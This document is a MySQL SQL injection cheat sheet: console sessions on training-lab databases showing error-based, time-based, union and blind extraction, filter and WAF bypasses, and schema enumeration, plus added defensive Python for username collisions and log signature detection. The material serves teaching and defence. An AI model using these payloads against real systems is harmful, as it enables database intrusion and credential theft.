```
mysql> select * from users where id>1 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'
```
Time-based injection

```
select * from users where id>1 order by id limit 1,1 procedure analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) like 5,BENCHMARK(5000000,SHA1(1)),1))))),1);
```
MySQL has a global system variable called secure_file_priv. It restricts data import and export operations such as SELECT ... INTO OUTFILE and LOAD_FILE(). If secure_file_priv is empty, these functions can be used directly; if it is NULL, they cannot be used. Versions before MySQL 5.5.53 default it to empty, later versions default it to NULL, so the feature is disabled by default.

```
mysql> show variables like "secure_file_priv";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+
```
floor error

Researchers found that when a GROUP BY clause follows an aggregate function such as count(), part of the query is displayed in the form of an error message. (Without the floor and rand functions no error is raised.)

```
mysql> select count(*),concat(0x3a,database(),0x3a,floor(rand()*2))a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry ':security:1' for key 'group_key'
```
Error based Double Query Injection

```
mysql> select * from users where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;
ERROR 1062 (23000): Duplicate entry '5.5.53~1' for key 'group_key'
```
Calling a user-defined function that does not exist in the current database produces an error saying the current database has no such function, which leaks the database name.

```
mysql> select username,phone from info where id=f();
ERROR 1305 (42000): FUNCTION security.f does not exist
```
Polygon and linestring leak the table name and database name

```
mysql> select username,phone from info where id=1 and Polygon(id);
ERROR 1367 (22007): Illegal non geometric '`security`.`info`.`id`' value found during parsing

mysql> select username,phone from info where id=1 and linestring(id);
ERROR 1367 (22007): Illegal non geometric '`security`.`info`.`id`' value found during parsing
```
exp()

```
select * from users where id=1 and exp(~(select * from(select user())a));
```
```
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from users;
+----+----------+------------+
| 1  | 2        | 3          |
+----+----------+------------+
|  1 | 2        | 3          |
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
+----+----------+------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from users)e;
+------------+
| 3          |
+------------+
| 3          |
| Dumb       |
| I-kill-you |
| p@ssword   |
+------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from users)e limit 1 offset 3;
+----------+
| 3        |
+----------+
| p@ssword |
+----------+
1 row in set (0.00 sec)

mysql> select * from users where id=1 union select (select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from users)e limit 1 offset 3)f,(select 1)g,(select 1)h;
+----------+----------+----------+
| id       | username | password |
+----------+----------+----------+
| 1        | Dumb     | Dumb     |
| p@ssword | 1        | 1        |
+----------+----------+----------+
2 rows in set (0.00 sec)
```
If union is not allowed

```
mysql> select * from users where id=1 and (select * from (select * from users as a join users as b) as c);
ERROR 1060 (42S21): Duplicate column name 'id'
```

Use using to leak the remaining columns one at a time:

```
mysql> select * from users where id=1 and (select * from (select * from users as a join users as b using(id))as c);
ERROR 1060 (42S21): Duplicate column name 'username'

mysql> select * from users where id=1 and (select * from (select * from users as a join users as b using(id,username))as c);
ERROR 1060 (42S21): Duplicate column name 'password'
```
```
mysql> insert into user value(1,'admin','123');
Query OK, 1 row affected (0.00 sec)

mysql> insert into user value(2,'admin     ','456');
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> select * from user;
+----+------------+------+
| id | user       | pwd  |
+----+------------+------+
|  2 | admin      | 456  |
|  1 | admin      | 123  |
+----+------------+------+
2 rows in set (0.00 sec)

mysql> select length(user) from user;
+--------------+
| length(user) |
+--------------+
|           10 |
|            5 |
+--------------+
2 rows in set (0.00 sec)
```

The lengths differ, but in the affected versions the id=2 user value 'admin     ' can log in at the front end, and in the back-end check it is treated as equal to the id=1 user value 'admin'.
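To make the collision above concrete from the defender's side, here is an added example (not code from the original post) that reproduces the trailing-space equality rule of MySQL's default PAD SPACE collations in Python and uses it as a registration guard. The column width of 10 is an assumption taken from the LENGTH() output above.

```python
# Added example, not from the original post.
# PAD SPACE collations ignore trailing spaces when comparing strings, so
# 'admin' = 'admin     ' is true even though LENGTH() reports 5 and 10.
USER_COLUMN_WIDTH = 10  # assumed VARCHAR(10), matching the LENGTH() output


def store_as_mysql_would(value, width=USER_COLUMN_WIDTH):
    """Mimic the silent truncation of an over-long value (the '1 warning')."""
    return value[:width]


def pad_space_equal(a, b):
    """Equality as a PAD SPACE collation sees it: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


def find_collision(existing_users, candidate):
    """Return the stored username the candidate would be treated as, or None."""
    stored = store_as_mysql_would(candidate)
    for user in existing_users:
        if pad_space_equal(user, stored):
            return user
    return None


def register(existing_users, candidate):
    """Reject usernames with trailing spaces and usernames that collide with an
    existing account under PAD SPACE rules; otherwise record the new name."""
    if candidate != candidate.rstrip(" "):
        raise ValueError("username must not end with spaces")
    if find_collision(existing_users, candidate) is not None:
        raise ValueError("username collides with an existing account")
    existing_users.append(candidate)
    return candidate


if __name__ == "__main__":
    users = ["admin"]  # constructed sample: the id=1 row from the page
    print(find_collision(users, "admin     "))  # the id=2 value maps to 'admin'
```

At the database layer the same guard is a UNIQUE KEY on the column, which already treats 'admin' and 'admin     ' as duplicates under PAD SPACE collations, or a BINARY comparison in the login query when the two must be distinguished.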
```
mysql> select * from users where id in (1,2);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
+----+----------+------------+
2 rows in set (0.00 sec)

mysql> select substr('abc',1,1) in ('z');
+----------------------------+
| substr('abc',1,1) in ('z') |
+----------------------------+
|                          0 |
+----------------------------+
1 row in set (0.00 sec)

mysql> select substr('abc',1,1) in ('a');
+----------------------------+
| substr('abc',1,1) in ('a') |
+----------------------------+
|                          1 |
+----------------------------+
1 row in set (0.00 sec)

mysql> select * from users where id between 1 and 3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
+----+----------+------------+
3 rows in set (0.00 sec)

mysql> select * from users where username between 'sa' and 'sz';
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
|  4 | secure   | crappy    |
|  5 | stupid   | stupidity |
|  6 | superman | genious   |
+----+----------+-----------+
3 rows in set (0.00 sec)
```

Hexadecimal is also supported:

```
mysql> select * from users where username between 0x7365 and 0x737a;
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
|  4 | secure   | crappy    |
|  5 | stupid   | stupidity |
|  6 | superman | genious   |
+----+----------+-----------+
3 rows in set (0.00 sec)
```

It can be combined with substring extraction for blind injection:

```
mysql> select * from users where substr(username,1,1) between 'a' and 'd';
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
5 rows in set (0.00 sec)

mysql> select 1,2,3 union select * from users;
+----+----------+------------+
| 1  | 2        | 3          |
+----+----------+------------+
|  1 | 2        | 3          |
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
+----+----------+------------+
6 rows in set (0.00 sec)

mysql> select passwd from (select 1,2,3 as passwd union select * from users)as twoname;
+------------+
| passwd     |
+------------+
| 3          |
| Dumb       |
| I-kill-you |
| p@ssword   |
| crappy     |
| stupidity  |
+------------+
6 rows in set (0.00 sec)
```
Determining the column count under limit

```
mysql> select * from users limit 1,1 into @,@;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

mysql> select * from users limit 1,1 into @,@,@;
Query OK, 1 row affected (0.00 sec)
```
With an OR condition, if both sides are true all rows are returned; otherwise only the rows matching the side that is true are returned.
BENCHMARK

The BENCHMARK function executes a given expression a specified number of times; with a large count it achieves the same effect as the sleep function.

```
mysql> select if(left(version(),1)=5,BENCHMARK(10000000,SHA('1')),1);
+--------------------------------------------------------+
| if(left(version(),1)=5,BENCHMARK(10000000,SHA('1')),1) |
+--------------------------------------------------------+
|                                                      0 |
+--------------------------------------------------------+
1 row in set (3.60 sec)
```
Bypassing the \' (escaped quote) filter

Hex encoding:

```
SELECT password FROM Users WHERE username = 0x61646D696E
```

char encoding:

```
SELECT password FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
```
Using ~:

```
mysql> select * from user union select 1,2,~3,~4;
+----+----------+----------------------------------+----------------------+
| id | username | passwd                           | role                 |
+----+----------+----------------------------------+----------------------+
|  1 | admin    | 9135967b6c6b40aa49f070360ea99b1f | admin                |
|  1 | 2        | 18446744073709551612             | 18446744073709551611 |
+----+----------+----------------------------------+----------------------+
2 rows in set (0.00 sec)
```

Using a decimal point (.):

```
mysql> select * from user union select 1,2,.3,.4;
+----+----------+----------------------------------+-------+
| id | username | passwd                           | role  |
+----+----------+----------------------------------+-------+
|  1 | admin    | 9135967b6c6b40aa49f070360ea99b1f | admin |
|  1 | 2        | 0.3                              | 0.4   |
+----+----------+----------------------------------+-------+
2 rows in set (0.00 sec)
```

Using the characters *9e0: *9e0 joins onto the preceding id=1', so the back-end query may become select * from user where id='1'*9e0; in MySQL 9e0 means 9 times 10 to the power 0, so MySQL coerces the string '1' to the number 1 and multiplies it by 9, and the statement becomes select * from article where id='1'

```
mysql> select * from user where id='1' *9e0 union select 1,2,3,4;
+----+----------+--------+------+
| id | username | passwd | role |
+----+----------+--------+------+
|  1 | 2        | 3      | 4    |
+----+----------+--------+------+
1 row in set (0.00 sec)
```

Adding e0 in front of a keyword such as from:

```
mysql> select * from user where id=1 union select 1,2,3,4e0from user;
+----+----------+----------------------------------+-------+
| id | username | passwd                           | role  |
+----+----------+----------------------------------+-------+
|  1 | admin    | 9135967b6c6b40aa49f070360ea99b1f | admin |
|  1 | 2        | 3                                | 4     |
+----+----------+----------------------------------+-------+
2 rows in set (0.00 sec)
```
innodb

From MySQL 5.7 onward, the built-in mysql database has two new tables, innodb_table_stats and innodb_index_stats. If a table uses the InnoDB engine, its table and key information is recorded in them. If the WAF blocks information_schema, these two tables can be used to inject the database name and table name.

```
mysql> select * from mysql.innodb_index_stats;
+---------------+---------------+------------+---------------------+--------------+------------+-------------+-----------------------------------+
| database_name | table_name    | index_name | last_update         | stat_name    | stat_value | sample_size | stat_description                  |
+---------------+---------------+------------+---------------------+--------------+------------+-------------+-----------------------------------+
| challenges    | ZGRW907ENU    | PRIMARY    | 2018-05-18 01:55:43 | n_diff_pfx01 |          0 |           1 | sessid                            |
| challenges    | ZGRW907ENU    | PRIMARY    | 2018-05-18 01:55:43 | n_leaf_pages |          1 |        NULL | Number of leaf pages in the index |
| challenges    | ZGRW907ENU    | PRIMARY    | 2018-05-18 01:55:43 | size         |          1 |        NULL | Number of pages in the index      |
| dvwa          | guestbook     | PRIMARY    | 2018-04-21 23:00:47 | n_diff_pfx01 |          0 |           1 | comment_id                        |
| dvwa          | guestbook     | PRIMARY    | 2018-04-21 23:00:47 | n_leaf_pages |          1 |        NULL | Number of leaf pages in the index |
| dvwa          | guestbook     | PRIMARY    | 2018-04-21 23:00:47 | size         |          1 |        NULL | Number of pages in the index      |
| dvwa          | users         | PRIMARY    | 2018-04-21 23:00:57 | n_diff_pfx01 |          5 |           1 | user_id                           |
| dvwa          | users         | PRIMARY    | 2018-04-21 23:00:57 | n_leaf_pages |          1 |        NULL | Number of leaf pages in the index |
| dvwa          | users         | PRIMARY    | 2018-04-21 23:00:57 | size         |          1 |        NULL | Number of pages in the index      |
| mysql         | gtid_executed | PRIMARY    | 2018-04-21 22:47:54 | n_diff_pfx01 |          0 |           1 | source_uuid                       |
| mysql         | gtid_executed | PRIMARY    | 2018-04-21 22:47:54 | n_diff_pfx02 |          0 |           1 | source_uuid,interval_start        |
| mysql         | gtid_executed | PRIMARY    | 2018-04-21 22:47:54 | n_leaf_pages |          1 |        NULL | Number of leaf pages in the index |
| mysql         | gtid_executed | PRIMARY    | 2018-04-21 22:47:54 | size         |          1 |        NULL | Number of pages in the index      |
| security      | emails        | PRIMARY    | 2018-05-18 01:55:43 | n_diff_pfx01 |          8 |           1 | id                                |
| security      | emails        | PRIMARY    | 2018-05-18 01:55:43 | n_leaf_pages |          1 |        NULL | Number of leaf pages in the index |
...............
```
sys

MySQL 5.7 added the sys schema, which consolidates all kinds of database information. The most useful part for us is probably the query column of the statement_analysis view, which records the (normalized) SQL statements that have been executed together with some statistics.

```
mysql> select version();
+-----------+
| version() |
+-----------+
| 8.0.13    |
+-----------+
1 row in set (0.00 sec)

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)
```
```
mysql> SELECT 18446744073709551610 * 2;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'

mysql> SELECT 18446744073709551610 * 1;
+--------------------------+
| 18446744073709551610 * 1 |
+--------------------------+
|     18446744073709551610 |
+--------------------------+
1 row in set (0.00 sec)

mysql> SELECT pow(9999,100);
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(9999,100)'

mysql> SELECT pow(9999,1);
+-------------+
| pow(9999,1) |
+-------------+
|        9999 |
+-------------+
1 row in set (0.00 sec)

mysql> SELECT exp((select 1)*18446744073709551615);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp((1 * 18446744073709551615))'

mysql> SELECT exp((select 0)*18446744073709551615);
+--------------------------------------+
| exp((select 0)*18446744073709551615) |
+--------------------------------------+
|                                    1 |
+--------------------------------------+
1 row in set (0.00 sec)
```
```
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

mysql> select mid(user() from -1);
+---------------------+
| mid(user() from -1) |
+---------------------+
| t                   |
+---------------------+
1 row in set (0.00 sec)

mysql> select mid(user() from -2);
+---------------------+
| mid(user() from -2) |
+---------------------+
| st                  |
+---------------------+
1 row in set (0.00 sec)
```
```
mysql> select * from users union select * from (select 1)a join (select 2)b join (select 3)c;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  1 | 2        | 3          |
+----+----------+------------+
4 rows in set (0.00 sec)
```
Numeric injection when and/or are filtered

```
mysql> select * from users where id=1/(select sleep(3));
Empty set, 17 warnings (51.06 sec)
```
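From the detection side, the error-based payloads earlier on the page (floor/rand GROUP BY, extractvalue, the geometry and overflow errors) and the timing payloads (BENCHMARK, the sleep division above) leave recognisable traces in the database error log and in query logs. This added example (not code from the original post) turns those traces into signatures and runs them over constructed sample log lines.

```python
import re

# Added example, not from the original post. Signatures are built from the
# error messages and timing functions shown on this page; SAMPLE_LOG is a
# constructed mix of general-query-log lines and application error lines.
ERROR_SIGNATURES = {
    "group_key_dup": re.compile(r"ERROR 1062 .*Duplicate entry .* for key 'group_key'"),
    "xpath_error":   re.compile(r"ERROR 1105 .*XPATH syntax error"),
    "udf_missing":   re.compile(r"ERROR 1305 .*FUNCTION \S+ does not exist"),
    "geometry_leak": re.compile(r"ERROR 1367 .*Illegal non geometric"),
    "overflow":      re.compile(r"ERROR 1690 .*value is out of range"),
}
PAYLOAD_SIGNATURES = {
    "error_floor_rand":   re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "error_extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "time_based":         re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}


def classify(line):
    """Return the names of every signature that matches one log line."""
    hits = []
    for table in (ERROR_SIGNATURES, PAYLOAD_SIGNATURES):
        for name, rx in table.items():
            if rx.search(line):
                hits.append(name)
    return hits


def scan(lines):
    """Map the index of each suspicious line to the signatures it triggered."""
    report = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            report[i] = hits
    return report


SAMPLE_LOG = [  # constructed sample, not a real capture
    "2018-05-18T01:55:43 Query  select * from users where id=1",
    "2018-05-18T01:55:44 Query  select count(*),concat(0x3a,database(),0x3a,floor(rand()*2))a from information_schema.tables group by a",
    "app: ERROR 1062 (23000): Duplicate entry ':security:1' for key 'group_key'",
    "2018-05-18T01:56:01 Query  select * from users where id=1/(select sleep(3))",
    "app: ERROR 1690 (22003): DOUBLE value is out of range in 'exp((1 * 18446744073709551615))'",
    "2018-05-18T01:56:10 Query  select username from users where id=2",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```

Error-message signatures fire on what the application or driver logs, and payload signatures need the general log or slow log to be enabled, so in practice the two sets come from different sources and are correlated by timestamp.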
```
mysql> select * from sys.x$schema_flattened_keys;
+--------------+-----------------------+-----------------+------------+----------------+-----------------------------------+
| table_schema | table_name            | index_name      | non_unique | subpart_exists | index_columns                     |
+--------------+-----------------------+-----------------+------------+----------------+-----------------------------------+
| security     | emails                | PRIMARY         |          0 |              0 | id                                |
| security     | referers              | PRIMARY         |          0 |              0 | id                                |
| security     | uagents               | PRIMARY         |          0 |              0 | id                                |
| security     | users                 | PRIMARY         |          0 |              0 | id                                |
+--------------+-----------------------+-----------------+------------+----------------+-----------------------------------+
```

Or:

```
mysql> select * from sys.schema_table_statistics;
```
Retrieving data without knowing the column names

```
mysql> SELECT * FROM USERS WHERE ID =1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 123      | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM USERS WHERE ID = ((select 1,123,'Dumb') <= (select * from users limit 1));
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 123      | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM USERS WHERE ID = ((select 2,123,'Dumb') <= (select * from users limit 1));
Empty set (0.00 sec)
```